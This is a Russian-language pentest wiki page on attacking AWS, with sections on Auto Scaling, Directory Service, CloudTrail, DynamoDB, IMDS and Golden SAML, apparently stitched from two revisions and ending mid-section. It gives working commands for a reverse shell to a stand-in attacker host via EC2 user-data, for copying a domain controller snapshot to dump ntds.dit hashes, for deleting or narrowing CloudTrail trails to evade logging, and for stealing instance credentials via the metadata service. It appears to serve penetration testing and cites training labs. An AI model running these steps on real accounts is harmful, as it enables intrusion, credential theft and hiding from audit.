== Auto Scaling (autoscaling) ==

Сервис для масштабирования приложений. Работает преимущественно с EC2, ECS, DynamoDB (таблицы и индексы) и Aurora.

Для работы сервиса требуется:

1. Конфигурация запуска EC2.

2. Конфигурация масштабирования.

== Роли - повышение привилегий ==

=== autoscaling:CreateLaunchConfiguration + autoscaling:Create(Update)AutoScalingGroup + iam:PassRole ===

Позволяет создать и запустить конфигурацию масштабирования.

==== Создаем конфигурацию запуска EC2 ====

Для создания требуется:

1. Image-id

2. iam-instance-profile

Следующая команда создает конфигурацию с командой из файла reverse-shell.sh:

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws autoscaling create-launch-configuration --launch-configuration-name demo3-LC --image-id ami-0f90b6b11936e1083 --instance-type t1.micro --iam-instance-profile demo-EC2Admin --metadata-options "HttpEndpoint=enabled,HttpTokens=optional" --associate-public-ip-address --user-data=file://reverse-shell.sh
</syntaxhighlight>

Пример содержимого reverse-shell.sh:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
#!/bin/bash
/bin/bash -l > /dev/tcp/atk.attacker.xyz/443 0<&1 2>&1
</syntaxhighlight>

==== Создаем и запускаем группу масштабируемости ====

Привилегия ec2:DescribeSubnets нужна для выбора нужной сети (чтобы EC2 смог сделать reverse-соедиенение к нам).

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws autoscaling create-auto-scaling-group --auto-scaling-group-name demo3-ASG --launch-configuration-name demo3-LC --min-size 1 --max-size 1 --vpc-zone-identifier "subnet-aaaabbb"
</syntaxhighlight>

Подробнее тут https://notdodo.medium.com/aws-ec2-auto-scaling-privilege-escalation-d518f8e7f91b

== AD (Directory Service) ==

Второе название - AWS Managed Microsoft Active Directory. Позволяет использовать Active Directory в AWS.

Основные понятия:

* EC2-Instance - VPS на которых крутится весь Active Directory

=== Роли - повышение привилегий ===

==== EC2:CreateSnapshot + EC2:RunInstance -> ShadowCopy ====

Позволяет провести атаку ShadowCopy на доменный контроллер и считать учетные данные всех пользователей.

Последовательность атаки:

1. Получаем список инстансов

2. Создаем Snapshot выбранного сервера

3. Редактируем атрибуты у SnapShot для доступа с аккаунта атакующего.
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws ec2 modify-snapshot-attribute --snapshot-id snap-1234567890abcdef0 --attribute createVolumePermission --operation-type remove --user-ids 123456789012
</syntaxhighlight>

4. Переключаемся на аккаунт атакующего

5. Создаем новый Linux EC2-инстанс, к которому будет прикреплен SnapShot

6. Подключаемся по SSH и получаем данные из SnapShot
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
sudo -s
mkdir /tmp/windows
mount /dev/xvdf1 /tmp/windows/
cd /tmp/windows/
</syntaxhighlight>

7. Работаем с данными на примонтированном диске, который будет в /tmp/windows/. Пример команд для извлечения ntds.dit:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
cp /windows/Windows/NTDS/ntds.dit /home/ec2-user
cp /windows/Windows/System32/config/SYSTEM /home/ec2-user
chown ec2-user:ec2-user /home/ec2-user/*
# Sftp - скачиваем файлы:
/home/ec2-user/SYSTEM
/home/ec2-user/ntds.dit
# Получаем учетные данные, используя Impacket-secretsdump
secretsdump.py -system ./SYSTEM -ntds ./ntds.dit local -outputfile secrets
</syntaxhighlight>

== CloudTrail ==

Сервис для аудита событий в AWS-аккаунте (включен в каждом аккаунте по-умолчанию). Сервис позволяет вести журналы, осуществлять непрерывный мониторинг и сохранять информацию об истории аккаунта в пределах всей используемой инфраструктуры AWS.

Записывает:

* API-вызовы

* Логины в систему

* События сервисов

* ???

Важен при операциях RedTeam.

Название файла логов:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
AccountID_CloudTrail_RegionName_YYYYMMDDTHHmmZ_UniqueString.FileNameFormat
</syntaxhighlight>

S3 путь до логов:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
BucketName/prefix/AWSLogs/AccountID/CloudTrail/RegionName/YYYY/MM/DD
</syntaxhighlight>

Путь у CloudTrail-Digest файлов:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
s3://s3-bucket-name/optional-prefix/AWSLogs/aws-account-id/CloudTrail-Digest/region/digest-end-year/digest-end-month/digest-end-data/aws-account-id_CloudTrail-Digest_region_trail-name_region_digest_end_timestamp.json.gz
</syntaxhighlight>

Основные поля у событий:

* eventName - имя API-endpoint

* eventSource - вызванный сервис

* eventTime - время события

* SourceIPAddress - ip-адрес источника

* userAgent - метод запроса
** "signing.amazonaws.com" - запрос от AWS Management Console
** "console.amazonaws.com" - запрос от root-пользователя аккаунта
** "lambda.amazonaws.com" - запрос от AWS Lambda

* requestParameters - параметры запроса

* responseElements - элементы ответа.

Временные параметры:

* 5 минут - сохраняется новый лог-файл

* 15 минут - сохраняется в S3.

Важно! Сохраняется чексумма файлов, поэтому пользователи могут удостовериться что логи не менялись.
Также логи могут уходить напрямую в CloudWatch - администраторам может прилететь уведомление об ИБ-инцидентах. Или события могут быть проанализированы внутренним модулем CloudTrail - Insights на предмет необычной активности.

=== Роли - управление ===

==== cloudtrail:DeleteTrail ====

Позволяет отключить мониторинг:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws cloudtrail delete-trail --name cloudgoat_trail --profile administrator
</syntaxhighlight>

==== cloudtrail:UpdateTrail ====

Права на редактирование правил монитринга.

Отключить мониторинг глобальных сервисов:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws cloudtrail update-trail --name cloudgoat_trail --no-include-global-service-event
</syntaxhighlight>

Отключить мониторинг на конкретные регионы:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws cloudtrail update-trail --name cloudgoat_trail --no-include-global-service-event --no-is-multi-region --region=eu-west
</syntaxhighlight>

==== validate-logs ====

Проверить, были ли изменены логи.

aws cloudtrail validate-logs --trail-arn <trailARN> --start-time <start-time> [--end-time <end-time>] [--s3-bucket <bucket-name>] [--s3-prefix <prefix>] [--verbose]

=== Эксплуатация ===

==== Обход правила по UserAgent ====

На сервисе есть правило, по которому определяет, что запросы были сделаны с kali/parrot/pentoo используя awscli.

Для этого можно воспользоваться утилитой pacu, которая автоматически подменяет useragent. Использование утилиты в конце статьи.

== DynamoDB ==

Cистема управления базами данных класса NoSQL в формате «ключ — значение».

=== Роли - управление ===

==== dynamodb:ListTables ====

Позволяет посмотреть спрсок таблиц базы данных.
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws --endpoint-url http://s3.bucket.htb dynamodb list-tables

{
"TableNames": [
"users"
]
}
</syntaxhighlight>

==== dynamodb:Scan ====

Получение обьектов из базы данных:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws --endpoint-url http://s3.bucket.htb dynamodb scan --table-name users | jq -r '.Items[]'

{
"password": {
"S": "Management@#1@#"
},
"username": {
"S": "Mgmt"
}
}
</syntaxhighlight>

== ES (ElasticSearch) ==

ElasticSearch от AWS. Используется для просмотра логов/журналов, поиска на вебсайте и тд.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://{user_provided}-{random_id}.{region}.es.amazonaws.com
</syntaxhighlight>

== ELB (Elastic Load Balancing) ==

Балансировщик нагрузки.

Формат ссылки (elb_v1):
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
http://{user_provided}-{random_id}.{region}.elb.amazonaws.com:80/443
</syntaxhighlight>

Формат ссылки (elb_v2):
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://{user_provided}-{random_id}.{region}.elb.amazonaws.com
</syntaxhighlight>

== RDS (Relational Database Service) ==

Облачная реляционная база данных (на выбор).

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
mysql://{user_provided}.{random_id}.{region}.rds.amazonaws.com:3306
postgres://{user_provided}.{random_id}.{region}.rds.amazonaws.com:5432
</syntaxhighlight>

== Route 53 ==

Настраиваемая служба DNS.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
{user_provided}
</syntaxhighlight>

== API Gateway ==

API-сервис, который будет доступен почти со всех серверов.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://{restapi_id}.execute-api.{region}.amazonaws.com/{stage_name}/
https://{random_id}.execute-api.{region}.amazonaws.com/{user_provided}
</syntaxhighlight>

== CloudSearch ==

Альтернатива сервису ElasticSearch. Система для упрощения поиска для администрирования и, например, на вебсайте.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://doc-{user_provided}-{random_id}.{region}.cloudsearch.amazonaws.com
</syntaxhighlight>

== Transfer Family ==

Группа сервисов для передачи файлов (S3/EFS) по (SFTP, FTPS, FTP).

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
sftp://s-{random_id}.server.transfer.{region}.amazonaws.com
ftps://s-{random_id}.server.transfer.{region}.amazonaws.com
ftp://s-{random_id}.server.transfer.{region}.amazonaws.com
</syntaxhighlight>

== IoT (Internet Of Things) ==

Сервис для управления IoT-устройствами.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
mqtt://{random_id}.iot.{region}.amazonaws.com:8883
https://{random_id}.iot.{region}.amazonaws.com:8443
https://{random_id}.iot.{region}.amazonaws.com:443
</syntaxhighlight>

== MQ ==

Сервис брокера сообщений для Apache ActiveMQ & RabbitMQ.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://b-{random_id}-{1,2}.mq.{region}.amazonaws.com:8162
ssl://b-{random_id}-{1,2}.mq.{region}.amazonaws.com:61617
</syntaxhighlight>

== MSK (Managed Streaming for Apache Kafka) ==

Сервис потоковой передачи данных в Apache Kafka.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
b-{1,2,3,4}.{user_provided}.{random_id}.c{1,2}.kafka.{region}.amazonaws.com
{user_provided}.{random_id}.c{1,2}.kafka.useast-1.amazonaws.com
</syntaxhighlight>

== Cloud9 ==

Облачная интегрированная среда разработки(IDE) используя только браузер.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://{random_id}.vfs.cloud9.{region}.amazonaws.com
</syntaxhighlight>

== MediaStore ==

Cервис хранилища AWS, оптимизированный для мультимедийных материалов.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://{random_id}.data.mediastore.{region}.amazonaws.com
</syntaxhighlight>

== Kinesis Video Streams ==

Обеспечивает простую и безопасную потоковую передачу видео с подключенных устройств в AWS для воспроизведения, аналитики, машинного обучения (ML) и других видов обработки.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://{random_id}.kinesisvideo.{region}.amazonaws.com
</syntaxhighlight>

== Elemental MediaConvert ==

Сервис перекодирования видеофайлов с возможностями на уровне вещательных компаний. Он позволяет просто создавать контент в формате «видео по требованию» (VOD) для трансляций, в том числе мультиэкранных, в любом масштабе.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://{random_id}.mediaconvert.{region}.amazonaws.com
</syntaxhighlight>

== Elemental MediaPackage ==

Cервис для подготовки и защиты видеоконтента, распространяемого через Интернет. AWS Elemental MediaPackage использует один источник видео и создает на его основе специализированные видеопотоки для воспроизведения на подключенных телевизорах, мобильных телефонах, компьютерах, планшетах и игровых консолях.

Формат ссылки:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
https://{random_id}.mediapackage.{region}.amazonaws.com/in/v1/{random_id}/channel
</syntaxhighlight>

== ECR (Elastic Container Registry) ==

Региональный сервис, предназначенный для обеспечения гибкого развертывания образов.

=== Роли - управление ===

==== ecr:ListImages ====

Получить список образов:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws ecr list-images --repository-name <ECR_name> --registry-id <UserID> --region <region> --profile <profile_name>
</syntaxhighlight>

==== ecr:GetDownloadUrlForLayer ====

Позволяет получить URL на скачивание образа.

==== ecr:GetDownloadUrlForLayer + ecr:BatchGetImage + ecr:GetAuthorizationToken ====

Позволяет скачать образ (мб потребуется и ecr:ListImages чтобы получить список образов):
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws ecr get-login
docker pull <UserID>.dkr.ecr.us-east-1.amazonaws.com/<ECRName>:latest
docker inspect sha256:079aee8a89950717cdccd15b8f17c80e9bc4421a855fcdc120e1c534e4c102e0
</syntaxhighlight>

== Augmented AI (Amazon A2I) ==

Предоставляет интерфейс для обработки человеком предварительных результатов, полученных с помощью машинного обучения.

[[File:Product-Page-Diagram A2I.png| 500px]]

Данные сохраняются в S3, а также к задаче прикрепляется IAM-роль .

При создании задачи разделяется на 3 варианта:

* Textract - извлечение пары ключ-значение из текста

* Rekognition - определение того, что изображено на фото. Например, чтобы оградить от 18+ контента.

* Custom - пользовательский вариант

Интересный факт - использует "Quill Rich Text Editor" для текста с инструкциями. То есть, если в нем будет уязвимость, то можно проверить амазон тоже.

https://aws.amazon.com/ru/augmented-ai/

Также у сервиса есть Workers - сервера, выполняющие кучу тасков. Они могут быть трех типов:

1. Amazon Mechanical Turk - тупо сервера Amazon, за которые надо платить.

2. Private - юзают если обрабатывают приватную инфу или задачи, не поддерживаемые первым пунктом (ну или регион не поддерживается). Это команды, которые имеют доступ к данным и которые могут запускать задачи. Команды менеджарятся с Amazon Cognito.

3. Vendor - решения сторонних разработчиков.

=== Роли ===

==== AmazonAugmentedAIIntegratedAPIAccess ====

Дает доступ к Augmented AI Runtime, Amazon Rekognition или Amazon Textract API.

TODO: проверить, дает ли это еще возможностей злоумышленнику

== CodeGuru ==

https://aws.amazon.com/ru/codeguru/

== Comprehend ==

https://aws.amazon.com/ru/comprehend/

== DevOps Guru ==

https://aws.amazon.com/ru/devops-guru/

== Elastic Inference ==

https://aws.amazon.com/machine-learning/elastic-inference/

== Forecast ==

https://aws.amazon.com/ru/forecast/

== Fraud Detector ==

https://aws.amazon.com/ru/fraud-detector/

== HealthLake ==

https://aws.amazon.com/healthlake/

== Kendra ==

https://aws.amazon.com/kendra/?did=ap_card&trk=ap_card

== Lex ==

https://aws.amazon.com/lex/?did=ap_card&trk=ap_card

== Lookout for Equipment ==

https://aws.amazon.com/ru/lookout-for-equipment/

== Lookout for Metrics ==

https://aws.amazon.com/lookout-for-metrics/

== Lookout for Vision ==

https://aws.amazon.com/lookout-for-vision/

== Monitron ==

https://aws.amazon.com/monitron/

== Personalize ==

https://aws.amazon.com/personalize/

== Polly ==

https://aws.amazon.com/polly/

== Rekognition ==

https://aws.amazon.com/rekognition/

== SageMaker ==

https://aws.amazon.com/sagemaker/

== SageMaker Ground Truth ==

https://aws.amazon.com/sagemaker/groundtruth/

== Textract ==

https://aws.amazon.com/textract/

== Transcribe ==

https://aws.amazon.com/transcribe/

== Translate ==

https://aws.amazon.com/translate/

== Apache MXNet ==

https://aws.amazon.com/ru/mxnet/

== Deep Learning Containers ==

https://aws.amazon.com/machine-learning/containers/

== DeepComposer ==

https://aws.amazon.com/deepcomposer/

== DeepLens ==

https://aws.amazon.com/deeplens/

== DeepRacer ==

https://aws.amazon.com/deepracer/

== Inferentia ==

https://aws.amazon.com/machine-learning/inferentia/

== Panorama ==

https://aws.amazon.com/panorama/

== PyTorch ==

https://aws.amazon.com/pytorch/

== TensorFlow ==

https://aws.amazon.com/tensorflow/

== Deep Learning AMI ==

https://aws.amazon.com/machine-learning/amis/

= Утилиты =

== Вычисление ролей ==

=== enumerate-iam ===
github.com:andresriancho/enumerate-iam.git

== Эксплуатация ==

=== Golden SAML ===

Суть атаки в том, что зная ключ, которым подписываются SAML-запросы, вы можете подделать ответ и получить произвольные привилегии в SSO.

Подробнее про эксплуатацию тут: https://www.cyberark.com/resources/threat-research-blog/golden-saml-newly-discovered-attack-technique-forges-authentication-to-cloud-apps

==== shimit ====
https://github.com/cyberark/shimit

Установка:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:auto" >
cd /tmp
python -m pip install boto3 botocore defusedxml enum python_dateutil lxml signxml
git clone https://github.com/cyberark/shimit
cd shmit
python shmit.py
</syntaxhighlight>

В начале потребуется доступ к AD FS аккаунту из персонального хранилища которого украсть приватный ключ ключ.
Сделать это можно используя mimikatz, но в примере сделано через библиотеку Microsoft.Adfs.Powershell и powershell

Пример эксплуатации:
<syntaxhighlight lang="powershell" line="1" enclose="div" style="overflow-x:auto" >
# Получаем приватный ключ
[System.Convert]::ToBase64String($cer.rawdata)
(Get-ADFSProperties).Identifier.AbsoluteUri
(Get-ADFSRelyingPartyTrust).IssuanceTransformRule

# Получаем инфу о юзерах - выбираем цель
aws iam list-users

# Получаем токен
python .\shimit.py -idp http://adfs.lab.local/adfs/services/trust -pk key_file -c cert_file
-u domain\admin -n admin@domain.com -r ADFS-admin -r ADFS-monitor -id 123456789012

# Проверяем текущий аккаунт
aws opsworks describe-my-user-profile
</syntaxhighlight>

== Проверки безопасности ==

Для администраторов преимущественно.

=== Zeus ===

https://github.com/DenizParlak/Zeus

== Другое ==

=== aws_consoler ===

https://github.com/NetSPI/aws_consoler

== All-In-One ==

=== pacu ===

https://github.com/RhinoSecurityLabs/pacu

=== ScoutSuite ===

https://github.com/nccgroup/ScoutSuite

=== cloudfox ===

https://github.com/BishopFox/cloudfox

= Ссылки =

== Статьи ==

[https://frichetten.com/blog/hijack-iam-roles-and-avoid-detection/ Hijacking IAM Roles and Avoiding Detection]

[https://frichetten.com/blog/bypass-guardduty-pentest-alerts/ Bypass GuardDuty PenTest Alerts]

[https://frichetten.com/blog/ssm-agent-tomfoolery/ Intercept SSM Agent Communications]

== Лаборатории ==

[https://medium.com/poka-techblog/privilege-escalation-in-the-cloud-from-ssrf-to-global-account-administrator-fd943cf5a2f6 Damn Vulnerable Cloud Application]

[https://github.com/nccgroup/sadcloud SadCloud]

[http://flaws.cloud Flaws]

[http://flaws2.cloud/ Flaws]

[https://xakep.ru/2022/03/21/htb-stacked/ HackTheBox Stacked Writeup]

[https://github.com/RhinoSecurityLabs/cloudgoat CloudGoat]

[https://github.com/nccgroup/sadcloud SadCloud]

[https://www.wellarchitectedlabs.com/security/ AWS Well-Architected Labs]

[https://labs.withsecure.com/publications/attack-detection-fundamentals-2021-aws-lab-1 Attack Detection Fundamentals 2021: AWS - Lab #1]

[https://pentesting.cloud/ Free AWS Security Labs]

== Краткие заметки ==

[https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Cloud%20-%20AWS%20Pentest.md PayloadAllTheThings]

[https://book.hacktricks.xyz/pentesting/pentesting-web/buckets/aws-s3 hacktricks-s3]

[https://book.hacktricks.xyz/cloud-security/aws-security hacktricks-aws]

[https://learntocloud.guide/#/phase5/README learntocloud(много ссылок)]

== Книги ==

[https://www.amazon.com/dp/1789136725/ Hands-On AWS Penetration Testing with Kali Linux]

Aws

2022-10-17T10:47:39Z

Drakylar: /* Augmented AI (Amazon A2I) */

AWS - Amazon Web Service. Одна из первых облачных систем, состоящая из многих сервисов, которые при некорректной настройке оставляют дыры в безопасности.

= Организационные моменты =

При проведении тестирования на проникновение, требуется предупредить AWS (составить заявку).

Подробнее тут: https://aws.amazon.com/ru/security/penetration-testing/

= Общие концепции =

== Службы ==

Концепция служб в AWS позволяет автоматизировать многие процессы, включая саму разработку архитектуры.

Это экосистема многих сервисов. И AWS стремится увеличить их количество.

Например, связать сервис сбора логов и сервис по реагированию на инциденты, а результаты класть на сервис S3.

== Регионы ==

AWS разделен на регионы. Часть сервисов кросс-региональные, но большинство привязываются к конкретным регионам.

{| class="wikitable"
|+Регионы AWS
|-
| '''Название региона'''
| '''Endpoint(HTTPS)'''
|-
|us-east-2
|rds.us-east-2.amazonaws.com

rds-fips.us-east-2.api.aws

rds.us-east-2.api.aws

rds-fips.us-east-2.amazonaws.com
|-
|us-east-1
|rds.us-east-1.amazonaws.com

rds-fips.us-east-1.api.aws

rds-fips.us-east-1.amazonaws.com

rds.us-east-1.api.aws
|-
|us-west-1
|rds.us-west-1.amazonaws.com

rds.us-west-1.api.aws

rds-fips.us-west-1.amazonaws.com

rds-fips.us-west-1.api.aws
|-
|us-west-2
|rds.us-west-2.amazonaws.com

rds-fips.us-west-2.amazonaws.com

rds.us-west-2.api.aws

rds-fips.us-west-2.api.aws
|-
|af-south-1
|rds.af-south-1.amazonaws.com

rds.af-south-1.api.aws
|-
|ap-east-1
|rds.ap-east-1.amazonaws.com

rds.ap-east-1.api.aws
|-
|ap-southeast-3
|rds.ap-southeast-3.amazonaws.com
|-
|ap-south-1
|rds.ap-south-1.amazonaws.com

rds.ap-south-1.api.aws
|-
|ap-northeast-3
|rds.ap-northeast-3.amazonaws.com

rds.ap-northeast-3.api.aws
|-
|ap-northeast-2
|rds.ap-northeast-2.amazonaws.com

rds.ap-northeast-2.api.aws
|-
|ap-southeast-1
|rds.ap-southeast-1.amazonaws.com

rds.ap-southeast-1.api.aws
|-
|ap-southeast-2
|rds.ap-southeast-2.amazonaws.com

rds.ap-southeast-2.api.aws
|-
|ap-northeast-1
|rds.ap-northeast-1.amazonaws.com

rds.ap-northeast-1.api.aws
|-
|ca-central-1
|rds.ca-central-1.amazonaws.com

rds.ca-central-1.api.aws

rds-fips.ca-central-1.api.aws

rds-fips.ca-central-1.amazonaws.com
|-
|eu-central-1
|rds.eu-central-1.amazonaws.com

rds.eu-central-1.api.aws
|-
|eu-west-1
|rds.eu-west-1.amazonaws.com

rds.eu-west-1.api.aws
|-
|eu-west-2
|rds.eu-west-2.amazonaws.com

rds.eu-west-2.api.aws
|-
|eu-south-1
|rds.eu-south-1.amazonaws.com

rds.eu-south-1.api.aws
|-
|eu-west-3
|rds.eu-west-3.amazonaws.com

rds.eu-west-3.api.aws
|-
|eu-north-1
|rds.eu-north-1.amazonaws.com

rds.eu-north-1.api.aws
|-
|me-south-1
|rds.me-south-1.amazonaws.com

rds.me-south-1.api.aws
|-
|sa-east-1
|rds.sa-east-1.amazonaws.com

rds.sa-east-1.api.aws
|-
|us-gov-east-1
|rds.us-gov-east-1.amazonaws.com
|-
|us-gov-west-1
|rds.us-gov-west-1.amazonaws.com
|}

Или только регионы (могут пригодиться при переборе):
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
us-east-2
us-east-1
us-west-1
us-west-2
af-south-1
ap-east-1
ap-southeast-3
ap-south-1
ap-northeast-3
ap-northeast-2
ap-southeast-1
ap-southeast-2
ap-northeast-1
ca-central-1
eu-central-1
eu-west-1
eu-west-2
eu-south-1
eu-west-3
eu-north-1
me-south-1
sa-east-1
us-gov-east-1
us-gov-west-1
</syntaxhighlight>

== Доступы ==

== Консольная утилита(awscli) ==

Чаще всего для взаимодействия с сервисами AWS вам потребуется консольная утилита awscli.

Утилита работает с настроенными профилями.

=== Файлы ===

==== ~/.aws/credentials ====

Файл с учетными данными профилей. Перефразирую: получив данные из этого файла вы, вероятнее всего, получите контроль над аккаунтами в нем.

У каждого профиля будет указан:

* Access Key ID - 20 случайных букв/цифр в верхнем регистре, часто начинается с "AKIA..."

* Access Key - 40 случайных символов различного регистра.

* Access Token - не всегда указывается

Полный список параметров можно посмотреть тут: https://docs.aws.amazon.com/cli/latest/userguide/cli-configure-files.html#cli-configure-files-settings

Пример содержимого файла (сохранен профиль default):

<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
[default]
aws_access_key_id=AKIAIOSFODNN7EXAMPLE
aws_secret_access_key=wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY
aws_session_token = AQoEXAMPLEH4aoAH0gNCAPyJxz4BlCFFxWNE1OPTgk5TthT+FvwqnKwRcOIfrRh3c/LTo6UDdyJwOOvEVPvLXCrrrUtdnniCEXAMPLE/IvU1dYUg2RVAJBanLiHb4IgRmpRV3zrkuWJOgQs8IZZaIv2BXIa2R4Olgk
</syntaxhighlight>

==== ~/.aws/config ====

Файл с региональными настройками профиля(регион по-умолчанию).
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
[default]
region=us-west-2
output=json
</syntaxhighlight>

==== ~/.aws/cli/cache ====

Закешированные учетные данные

==== ~/.aws/sso/cache ====

Закешированные данные Single-Sign-On

=== Команды ===

Общее построение команды выглядит как:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
aws <название_сервиса> <действие> <дополнительные_аргументы>
</syntaxhighlight>

Примеры:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# Вывести все S3-хранилища.
aws s3 ls

# Создание нового пользователя - сервис IAM
aws iam create-user --user-name aws-admin2
</syntaxhighlight>

== IMDS (Instance Metadata Service) ==

Это http API для запросов из EC2. Полезно если, например, у вас есть уязвимость SSRF в EC2.

Есть 2 версии:

*IMDSv1 - версия 1 по-умолчанию, не требует токен.

*IMDSv2 - версия 2, для запросов требуется токен.

Запрос без токена:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
curl http://169.254.169.254/latest/meta-data/
</syntaxhighlight>

Запрос с токеном:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
TOKEN=`curl -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600"` && curl -H "X-aws-ec2-metadata-token: $TOKEN" -v http://169.254.169.254/latest/meta-data/
</syntaxhighlight>

Кроме доп. информации можно получить access-token для доступа в AWS с сервисного аккаунта ec2 (только для IMDSv2):
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
# В начале делаем запрос на директорию /security-credentials/
http://169.254.169.254/latest/meta-data/iam/security-credentials/
# Потом выбираем нужный аккаунт и делаем запрос на него
http://169.254.169.254/latest/meta-data/iam/security-credentials/test-account
</syntaxhighlight>

Пример ответа:
<syntaxhighlight lang="json" line="1" enclose="div" style="overflow-x:scroll" >
{
"Code" : "Success",
"LastUpdated" : "2019-12-03T07:15:34Z",
"Type" : "AWS-HMAC",
"AccessKeyId" : "xxxxxxxxxxxxxxxxxxx",
"SecretAccessKey" : "xxxxxxxxxxxxxxxxxxxxx",
"Token" : "xxxxxxxxxxxxxxxxxxxxx",
"Expiration" : "2019-12-03T13:50:22Z"
}
</syntaxhighlight>
После чего эти учетные данные можно использовать с awscli.

Другие полезные Endpoint'ы:
<syntaxhighlight lang="bash" line="1" enclose="div" style="overflow-x:scroll" >
http://169.254.169.254/
http://169.254.169.254/latest/user-data
http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/
http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/iam/security-credentials/PhotonInstance
http://169.254.169.254/latest/meta-data/ami-id
http://169.254.169.254/latest/meta-data/reservation-id
http://169.254.169.254/latest/meta-data/hostname
http://169.254.169.254/latest/meta-data/public-keys/
http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key
http://169.254.169.254/latest/meta-data/public-keys/[ID]/openssh-key
http://169.254.169.254/latest/meta-data/iam/security-credentials/dummy
http://169.254.169.254/latest/meta-data/iam/security-credentials/s3access
http://169.254.169.254/latest/dynamic/instance-identity/document
</syntaxhighlight>

= Ролевая модель =

Почти все описание доступа идет через ролд. А роли в свою очередь состоят из двух типов политик:

* trust policy - определяет, чья будет роль

* permissions policy - определяет какой доступ будет у тех, у кого эта роль.

Каждая политика состоит из следующих компонентов:

* Ресурс - цель, кому выдается правило. Может быть:
** Пользователь
** Группа, в которой могут быть аккаунты по какому то признаку
** Другая политика.

* Роль(Action) - какое-либо действие (например, iam:ListGroupPolicies - посмотреть список груповых политик)

* Тип правила(Effect) - разрешение или запрет.

* Политика(Policy) - совокупность Роль(действие) -> разрешение/запрет -> Ресурс(кому).

* Условия(Condition) - отдельные условия, например, ip.

Пример политики:
<syntaxhighlight lang="json" line="1" enclose="div" style="overflow-x:scroll" >
{
"Version": "2012-10-17", //Версия политики
"Statement": [
{
"Sid": "Stmt32894y234276923" //Опционально - уникальный идентификатор
"Effect": "Allow", //Разрешить или запретить
"Action": [ //Разрешенные/Запрещенные действия
"ec2:AttachVolume",
"ec2:DetachVolume"
],
"Resource": [ //На какие ресурсы можно/нельзя совершать действия
"arn:aws:ec2:*:*:volume/*",
"arn:aws:ec2:*:*:instance/*"
],
"Condition": { //Опционально - условия срабатывания
"ArnEquals": {"ec2:SourceInstanceARN": "arn:aws:ec2:*:*:instance/instance-id"}
}
}
]
}
</syntaxhighlight>

== Определение ролей ==

=== Вручную ===
TODO команды по определению своих ролей

=== Автоматизированно ===

== Эксплуатация ==

Когда вы определили, какие роли у вас есть, перейдите выше на соответствующий сервис, к которому идет данная роль и прочтите как ее эксплуатировать.

Тут будут отдельные роли, которые не прикреплены ни к одному сервису.

=== Административный доступ ===

Как выглядит роль с административным доступом:
<syntaxhighlight lang="json" line="1" enclose="div" style="overflow-x:scroll" >
"Statement": [
{
"Effect": "Allow",
"Action": [
"*"
],
"Resource": "*"
}
]
</syntaxhighlight>

= Службы =

== IAM ==

Сервис по обеспечению контроля доступа. Подробнее про ролевую модель можно почитать в соответствующей главе.

=== Роли - повышение привилегий ===

==== iam:UpdateLoginProfile ====

